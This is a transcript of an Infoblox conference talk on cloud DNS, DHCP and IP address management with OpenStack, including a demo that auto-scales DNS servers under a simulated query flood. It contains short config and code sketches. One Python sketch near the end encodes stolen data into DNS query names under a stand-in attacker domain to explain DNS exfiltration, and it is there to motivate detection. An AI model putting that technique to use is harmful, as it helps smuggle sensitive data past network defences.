The story here from Infoblox, and what we're here to speak with you about today, is cloud IP allocation, cloud IPAM, and cloud-based DNS service. So Infoblox is a company, not a product. (I'm just going to hold this up to my mouth; I think we're having microphone issues.) The product here is Infoblox's DDI suite, so that's DNS, DHCP, and IPAM, running in, of course, OpenStack, running in Azure, running in VMware, running in Amazon Web Services. So this is available for your private cloud, for your public cloud, as well as your hybrid cloud solutions. And basically what we do is provide a single unified pane of glass for managing your DNS and IPAM. It provides consistent policies across all of your clouds, all of your environments, and provides visibility and analytics into how the network space is being used. Right? You wind up with this situation of overlapping network space across the public and private cloud areas, and we're helping deal with all of that. So I'd like to introduce you to what we lovingly refer to as our DDI stack. It's an acronym of acronyms: the Domain Name System, of course, turning names into numbers and back again. So openstack.org is represented there by a v4 and a v6 address, which I hope I got right. And on the reverse side, we turn that back around, and that's very important for internal services that may be doing a check to make sure that you are who you say you are. SSH is a famous example of that. If you've ever SSH'd to a server with a broken DNS resolver, you've sat there and waited forever before you got your command prompt back, right? That's reverse DNS. And our solution makes sure that forward matches reverse for you. So on the DHCP side, that's your traditional leasing of addresses, right? I have a pool of address space, and I'm a dynamic client, so I need an IP address. Who's going to give it to me? The Infoblox DHCP server does.
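The forward-matches-reverse idea can be made concrete: a reverse lookup doesn't query the IP address directly, it queries a specially constructed name under in-addr.arpa. A minimal sketch (the example address is just a documentation address):

```python
# Sketch: how the name for a reverse-DNS (PTR) query is built from an
# IPv4 address. The octets are reversed and suffixed with in-addr.arpa;
# a resolver then looks up a PTR record at that name to get the hostname.

def ptr_name(ipv4: str) -> str:
    """Return the in-addr.arpa name queried for a reverse lookup."""
    octets = ipv4.split(".")
    return ".".join(reversed(octets)) + ".in-addr.arpa"

print(ptr_name("192.0.2.10"))  # -> 10.2.0.192.in-addr.arpa
```

If the PTR record at that name doesn't match the forward A record, tools like SSH stall on the lookup; keeping the two in sync is exactly the host-record bookkeeping being described here.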
And the Infoblox DHCP server hands out addresses from available IPv4 and IPv6 address space. So there's a little star down there; it's really tiny and impossible to read from the back, but I'd like to say that it hands out addresses from the available space, and occasionally the unavailable space too, right? DHCP for IPv4 is a very client-driven protocol, and the client is not very smart; it just takes whatever the server gives it. And if you've statically configured something, that might be a conflicting address, and the rest of your infrastructure is totally unaware of that. Big-time problem, right? Nobody likes an IP conflict. And that's what the IPAM solution, the IP address management solution, is there for. IP address management is out there constantly learning from the network infrastructure itself. There's no hiding from IPAM, right? It learns from routers, it learns from switches and firewalls, layer-two and layer-three elements, from CAM tables, from routes. And even if you've got a personal firewall or some security instance blocking that discovery, if you're talking on the network, we know you're there, right? And we're tracking that address for you. So that's for planning, managing, and tracking, right? So the idea is: I'm going to merge with or acquire another business unit, or deploy new networks out at a remote campus or out on a WAN somewhere. If that space is overlapping, I want to make sure I'm managing it correctly inside of tenant or provider networking. And if it's not overlapping, and I'd like to keep it that way, I need a tool that's going to help me track all of that. So that's what we're there doing. In the ETSI reference model of things, we are a VNF, right? A virtual network function. And those virtual network functions are listed in the tiny little blue boxes that you can't read: IPAM, virtual DNS, virtual DHCP, and what we call our DNS firewall. That's Infoblox's DNS server with an embedded security function.
And that security function is helpful from an outside-in perspective as well as an inside-out perspective, and we'll talk about that a little later. But why does this matter? We've already discussed the idea of overlapping IP space. But DNS and those associated IP addresses, so your compute trying to find its controller, your storage trying to find its controller, that all starts with a DNS request. And if that piece isn't working, bad news, right? That's really bad for cloud and really bad for uptime. Every cloud solution handles this a little differently. Some of the public clouds, like AWS for example, don't allow you to run your own DHCP server inside them to give your instances IPs. In the case of OpenStack, you're running your own DHCP, probably dnsmasq if you're using baked-in Neutron and baked-in services today. It could be some external SDN provider as well: it could be Contrail or Nuage or what have you, right? And at the end of the day, this is multiple deployments, multiple products, and potentially a very big mess across the IP space, unless you've got cross-functional visibility and control across all of it. And again, that's Infoblox as a single pane of glass for you. Those cloud solutions can only see inside their own domain. They can't see each other, and that's by design; you've got security breakpoints in between each one of them. If you'd like something that can see across all of them, that's what we're here to do. And a big part of the way we do that is through the Neutron pluggable IP address management framework. In the old days, in Kilo and prior, this was an inbuilt function, and it just sort of happened within the natural ecosystem of OpenStack. Since Liberty and going forward, there's something called the pluggable IPAM framework. If you look inside your neutron.conf, there's an option for you to say: should I just use the built-in IPAM, or should I use the pluggable IPAM framework?
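For reference, a minimal sketch of what that choice looks like in neutron.conf; the exact option and section names should be checked against the networking-infoblox plugin documentation for your release:

```ini
# /etc/neutron/neutron.conf -- sketch of selecting the pluggable IPAM
# framework (Liberty and later). Leaving ipam_driver unset keeps the
# built-in reference IPAM.
[DEFAULT]
ipam_driver = infoblox

# Plugin-specific section; the option shown here is illustrative and
# should be taken from the networking-infoblox docs for your version.
[infoblox]
cloud_data_center_id = 1
```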
That pluggable IPAM framework speaks Infoblox's API. So what you do is define what we call our grid master; it's our control plane. You tell Neutron to go to the grid master for the next available network and the next available IP. And now your single pane of glass that's managing all of your tenant and provider networking space is aware, and actionable from that perspective, about how to give out the next network and the next IP, so you don't find yourself in an overlapping situation, if such is your desire. That cloud network automation plug-in also does a couple of very important things for you. It doesn't just hand an IP address to Neutron and go to bed. It goes out to that grid master, and as step three there, very importantly, we're creating that host record. So the forward and reverse mapping I was talking about before happens as part of the IP allocation procedure, and it's just handled for you. So there's no more having to deal with Designate or some off-board external management solution, or manually entering a whole bunch of stuff in your BIND server. All of that is simply removed from necessity. And that virtual machine then gets spun up, perhaps by Heat, perhaps by some external virtual controller. Almost nobody I know is running exactly one cloud or exactly one controller platform; there's a whole bunch of them. And so again, it's that single pane of glass that's maintaining that relationship for you. And that's probably beating IP addresses to death more than enough, huh? But nobody types IP addresses into web browsers, and you infrequently configure them for services to speak to each other, especially not IPv6 ones. They're a giant pain in the butt to type. They're very long, very complex, and very hard to remember. So you may never go to Facebook, but they do something very kitschy here: they put face:b00c inside their IPv6 addresses. It's actually a neat idea.
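Step three there, creating the host record, goes through Infoblox's WAPI REST interface. As a rough sketch, the request body could look something like this; the hostname, address, and exact field names shown are illustrative, so check the WAPI documentation for your NIOS version:

```python
import json

# Sketch of the host-record step: once Neutron has its IP, a host record
# (the forward + reverse mapping) is created on the grid master via the
# WAPI REST API. The FQDN and address below are made-up examples.

def host_record_payload(fqdn: str, ipv4: str) -> dict:
    """Build a record:host body; configure_for_dns asks for DNS mappings."""
    return {
        "name": fqdn,
        "configure_for_dns": True,
        "ipv4addrs": [{"ipv4addr": ipv4}],
    }

payload = host_record_payload("vm-1.example.org", "192.0.2.25")
print(json.dumps(payload))
# A real deployment would POST this to
# https://<grid-master>/wapi/v2.x/record:host with admin credentials.
```

The point being made in the talk is that none of this is something you script yourself: the cloud network automation plug-in issues the equivalent call as part of allocation.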
The face:b00c trick helps you remember things a little bit, but honestly, no way, right? So that's why everybody uses DNS all day long, from a human-interaction perspective. And we also use it from a machine-to-machine perspective, because it affords us a level of portability. If my server is called server one and I'm referencing server one, well, I can do all sorts of interesting things behind the label server one and you never know what happened, right? If I need to upgrade, if I need to patch, if I need to change over to server two but still call it server one, I can do that, and hide behind that name of server one. If I have an IP address, well, now I need a load balancer or some other bump in the wire to help manage all of that, and it just gets messy real fast, right? So we've got lots of options here. We can have hosts files, and you can type in the names of things and rsync that until you're blue in the face, and sure, that sounds like fun. Or NIS, the Yellow Pages, if anybody's ever worked on a Sun machine; I'm sorry. But getting back to this century, everybody's using DNS to do this now, right? So the concept here is that it binds everything together, and if you know what DNS is and you know what BIND is, I'm sorry for the terrible joke, but that is truly what's going on here. The DNS, the naming system, is binding together all of these nodes that are building out your cloud and your clusters for you. And so failing that service means failing your very important application and everything else that's driving it. So, a quick primer on DNS, because not everybody's a DNS nerd. It took me a bunch of years. I've been at Infoblox for nine and a half years and I'm still learning; there are parts of DNS I had no idea existed. It's an exciting time to work at Infoblox. But all of DNS is UDP and TCP based. There's no exotic protocol stuff you need to understand, other than that it's mostly UDP based. So if you're a stateful firewall, this means a nightmare for you.
And if there's some zone transfer going on, or some very large DNS responses, they may go over TCP as well, right? So now you're considering UDP rules and TCP rules and varying ports on the response side of everything. So just keeping track of DNS as a protocol can be an onerous thing to have to do. You have what's referred to as a primary authoritative server. So if you have zone.org, for example, you've got a primary server in charge of that zone and a number of slave servers that represent that service to the outside world; those are your secondary authoritative servers. And there's also something called a caching, or recursive caching, server. That's the thing your internal client talks to. In a lot of Active Directory environments, this might be a domain controller; in the case of your VMs, this is probably something like the IP that dnsmasq gave your client when it booted up. It might be built into OpenStack, it might be a corporate DNS server; it could be any of those things. All right, so the important thing to remember about DNS resolution is that a name is actually read from right to left, right? The root servers come first, so you go to root and say, hey, root, where is com, where is org? Where is this top of the DNS tree? And then it tells you where that is, and you iterate through these steps until you ultimately get to the IP address that's mapped to your name. So we start with an inferred dot, and you never type the dot, right? You type www.openstack.org and you're done. But it's actually www.openstack.org followed by a dot. And that dot is very important, because that's where the conversation starts. And you can see there are one, two, three hops in just finding this label. And every time you see that hop, every time there's that iteration, there's a chance for a bad guy to sneak in the wrong IP address, or sneak in the wrong label, to send you to his server or her server, where she can capture your information, capture your data, and do something bad with it.
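Those hops can be sketched in a few lines: the name is walked right to left, root first, one delegation per label. A toy illustration:

```python
# Sketch: DNS names resolve right to left. Starting from the implied
# trailing dot (the root zone), each step hands off to the servers for
# the next label, until the full name is reached.

def resolution_steps(fqdn: str) -> list:
    """Return the delegation points walked for a name, root first."""
    labels = fqdn.rstrip(".").split(".")
    steps = ["."]  # the root zone -- the inferred trailing dot
    for i in range(len(labels) - 1, -1, -1):
        steps.append(".".join(labels[i:]) + ".")
    return steps

print(resolution_steps("www.openstack.org"))
# ['.', 'org.', 'openstack.org.', 'www.openstack.org.']
```

Each entry after the root is one of the hops mentioned above, and each is a point where a spoofed answer could be injected.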
So why do we care about auto-scaling that service? Right, we already talked about why DNS is so critical: without it, nothing works. But there are sort of two reasons I like to talk about. One of them is the scary stuff, and the other one is the normal stuff, right? So, scary stuff: DNS is a vulnerable protocol. It's internet facing. It's either outside your firewall or in a DMZ, directly talking to the wild, wild West, and people are trying to attack it because they know it's a place where they can take your services offline. There is also the inside-out attack. Earlier I spoke about DNS firewall. Infoblox's DNS firewall is for the inside-out kind of attack, where the malware has made its way into your network, or is already on your network, and wants to steal sensitive data, like a spreadsheet full of credit card numbers, or your boss's email, or whatever, and it sneaks it out over DNS, the protocol. And it does this right through proxy servers, right through firewalls, right through IDSs. The IDS might see it, but by then it's already too late, and the firewalls and security endpoints at the edge of the world just let it happen, because DNS is a required protocol. It has to go out, right? So ultimately we're catching the scary stuff, and that takes compute and memory and resources and cycles, right? So at some point, if you've got a large enough network, you might need to scale that out in order to manage it. The outside-in attack is your standard DDoS conversation. There are a lot of inbound queries trying to overwhelm your resources, so now you need more resources, and having to do that manually is just not fun. It takes time, and time, as we all know, is an issue during an attack. And then there's the normal stuff: maybe your network is growing, maybe you acquired something, maybe you're at a trade show like OpenStack and more people walk in, and now all of a sudden we need more capacity because there are more people. So we plan for that, right?
We make some allowances and create some auto-scaling rules, and when we hit a certain point we expand and add more capacity. But that number-one reason is generally abuse. People are either trying to steal your data or trying to take out your DNS server, and either of those equals a failure of the network and of the service, right? The network exists in order to serve your service. So, the 10,000-foot view of what we're doing here: the phantom domain attack is one example of an attack, and if my internet connection is working, we're going to do a live demonstration of how this works. The inbound traffic causes a member to reach a certain level of load, and once it reaches that amount of load, it spins up an additional member, right? So that overload condition gets identified, and you set the policy on what overload really means. I've set some aggressive timers for what we're going to talk about here today, but it might be a thousand queries, it might be 2,000, it might be 20,000. So you baseline what normal looks like, then you decide what abnormal looks like, and start growing from there. So I'm going to go ahead and start up the load generator here so that we're not stuck waiting on something to fill itself out. And we should have... outstanding. Let's see, this is going to be really tiny, and this microphone kind of stinks, so let me move it real quick. Is that working well? Outstanding. So let's make this a little bigger. Familiar with eye charts? It's not fun to see from the back of the room. This is the how-fast-can-you-type part of the demonstration, right? So I'm running a load generator here that's generating 300 queries per second. Doesn't sound like a whole lot, but it's enough for us to normalize and baseline some traffic. Helps to be in the right directory. So we're going to have to shrink this one so it fits on the screen. And what we're looking at here is some standard OpenStack CLI output, right?
Up at the top there is a Ceilometer meter check. Each one of these on the left, in the resource ID field, represents a running Infoblox virtual machine, followed by the meter that we've installed for it. So this is as simple as pip-installing ceilometer-infoblox, networking-infoblox, and heat-infoblox. There are three moving parts that we leveraged to make use of all of this, but other than the actual GitHub software, you don't need to do a heck of a lot to your cloud in order to leverage the auto-scaling function. And that meter has a gauge on it, and we're seeing right now 300 queries per second, and then we've got a little timestamp over here telling us the last time we saw that. Now, importantly, underneath it are our two alarms, right? The alarm for what's high queries-per-second, and the alarm for what's low queries-per-second. And then underneath those are the various virtual machines that are already running. So I happen to have a CSR running, the Infoblox grid master, and one member. So we never scale down to zero, right? Scaling down to zero for DNS would be a bad thing. You want to have one member always running, otherwise you're not going to get any answers, and what fun would that be? So our topology here is pretty simple. We've got our router, we've got our outbound, our egress, over here; the grid master, the member, and that router that's running in there. By the way, I'm running a router here because the Infoblox DNS service supports anycast. So we peer over BGP or OSPF with some layer-three entity, and the built-in Neutron layer-three router, unless somebody wants to prove me wrong with Ocata or Pike, I don't think it supports peering with internal devices over OSPF or BGP yet. So, a third-party router in some regard, or just run it on a flat network that can talk to a router or something that can run those two protocols, right? And then you get a nice common IP address that never changes as your DNS server IP.
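The high and low alarms boil down to a simple piece of policy logic. A sketch, with illustrative thresholds and step size rather than product defaults:

```python
# Sketch of the scaling policy: baseline normal queries per second, then
# scale out above a high-water mark and back in below a low one. All the
# numbers here are illustrative assumptions, not defaults from the demo.

HIGH_QPS = 1000   # alarm-high threshold
LOW_QPS = 400     # alarm-low threshold
STEP = 2          # members added or removed per alarm
MIN_MEMBERS = 1   # never scale DNS down to zero

def scale_decision(qps: float, members: int) -> int:
    """Return the new member count for the observed query rate."""
    if qps > HIGH_QPS:
        return members + STEP
    if qps < LOW_QPS:
        return max(MIN_MEMBERS, members - STEP)
    return members

print(scale_decision(1400, 1))  # attack traffic: grow the cluster -> 3
print(scale_decision(300, 3))   # load subsided: shrink, floor of 1 -> 1
```

In the demo this decision isn't hand-coded, of course; it's expressed as Ceilometer alarms driving Heat scaling policies, but the floor of one always-running member is the same idea as MIN_MEMBERS here.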
And under Orchestration, you'll see the three stacks that represent that elastic DNS VNF. And there are some resources that were installed with that pip install I was talking about: Infoblox grid, anycast, loopback. See if we can do this. Yeah, much better. So we've got the anycast loopback, the BGP listener, the neighbor. You can deploy us in HA pairs if you like VRRP and you still think like an old network guy. Name server grouping, which allows an abstraction of how to manage things; all the various bits and pieces that are necessary for Heat to orchestrate Infoblox elements into existence, right? An entire grid. So you can do this whole thing programmatically. And then the actual Infoblox interface itself here: an HTTPS listener, an out-of-band management port. It slices, it dices, it makes julienne fries. You can deploy it in any number of different ways, with the interfaces facing the networks you need them to face, right? So, we're not going to need that. As our load generator is running down here, we're going to see some new compute entities come into existence. Let's get this to fit on one screen; it's hurting my eyes. There are our instances. And here's our topology of running services. So what we're going to do here is launch another one of those load generators, and we're going to simulate an attack. We're going to generate enough traffic to trip that policy and tell it it's time to make some new Infoblox. So I think 1,400 queries per second ought to do it. So we'll prime that up, and out they go. Now we'll let that run in the background a little. This takes a moment, because Ceilometer is periodically grabbing those samples, right? So once a minute, we're going to see one of those new samples, and eventually the samples will match what it is we're pinging away with in the background here. And what that will do is trip that alarm-high, right? So we're in an okay state right now.
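The scale-out wiring in those Heat stacks could look roughly like the following HOT fragment. The resource types are standard Heat; the nested member template name and the meter name are assumptions here, not the actual heat-infoblox resources:

```yaml
# Sketch only: standard Heat autoscaling shapes, with made-up names for
# the nested Infoblox member template and the queries-per-second meter.
resources:
  dns_members:
    type: OS::Heat::AutoScalingGroup
    properties:
      min_size: 1            # never scale DNS down to zero
      max_size: 5
      resource:
        type: infoblox_member.yaml   # nested template booting one member

  scale_up:
    type: OS::Heat::ScalingPolicy
    properties:
      auto_scaling_group_id: { get_resource: dns_members }
      adjustment_type: change_in_capacity
      scaling_adjustment: 2

  qps_high:
    type: OS::Ceilometer::Alarm
    properties:
      meter_name: nios.dns.qps      # assumed name for the installed meter
      threshold: 1000
      comparison_operator: gt
      alarm_actions:
        - { get_attr: [scale_up, alarm_url] }
```

A matching alarm-low and scale-down policy completes the loop, which is exactly the pair of alarms shown in the CLI output.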
Things are just humming along, doing DNS queries the way we normally expect. As soon as we have too many DNS queries, bam, the policy kicks in. The policy in this case is to add two or three additional VMs. Those VMs spin up, they join the anycast cluster, and all of your services now exist behind that one common IP address. So let's see where we stand. Still at 300. This is the hardest part of a presenter's job: waiting for the paint to dry and talking about it at the same time, right? Watching grass grow. So all that load is being applied to the VNF. We can talk about the exfiltration thing a little bit, I suppose. The exfiltration function, again, is data being captured on your network and then shipped out to the outside world using DNS as a super-highway, right? The idea there is that you can take anything. It can be credit cards, it can be a picture. In fact, that's going to take itself a moment, so I'm going to do something that you're probably never supposed to do: let's take an on-stage selfie here, just for right now. Say hi, everyone. All right, so now we've got a picture, and it's a right-now picture, nothing up my sleeve. And let's share that picture with my laptop so that we've got it locally. Let that guy finish copying while we finish up our load demonstration here. Come on, magic scaling, go. So this is about 154. As we are running out of time and I'm taking too long, I'm just going to show you the event. It would be helpful if the traffic was actually hitting our node. Scale-down policy, chipping away, deleting nodes. Okay, here it is. Yep, okay. So my apologies there, we did run out of time, but the policy kicks in, scales up, scales down. It adds two nodes, deletes two nodes, whatever you set the policy to be. So we've got this running in our booth, at D5, D3 as well. So please do feel free to swing by and we'll show you the thing live in action over there, as well as the exfiltration piece.
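The exfiltration trick itself is simple to sketch: the stolen bytes get encoded into query labels under a domain the attacker controls, so the data rides out on what looks like ordinary DNS traffic. The domain and chunk size here are illustrative:

```python
import base64

# Sketch of DNS exfiltration: data is base32-encoded and split into
# subdomain labels under an attacker-controlled zone; the attacker's
# authoritative server reassembles the queries it receives. The domain
# and chunk size are made-up examples (DNS labels max out at 63 chars).

def exfil_queries(data: bytes, domain: str = "evil.example", chunk: int = 32) -> list:
    """Encode data as base32 labels and split into DNS query names."""
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    return [encoded[i:i + chunk] + "." + domain
            for i in range(0, len(encoded), chunk)]

for q in exfil_queries(b"4111-1111-1111-1111"):
    print(q)  # each name looks like a normal DNS query on the wire
```

This is why the firewall waves it through: every one of those queries is well-formed DNS. Spotting them takes inspection of the DNS traffic itself, which is the inside-out detection role described for the DNS firewall.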
So thanks for your attention, thanks for your time, and happy Infobloxing.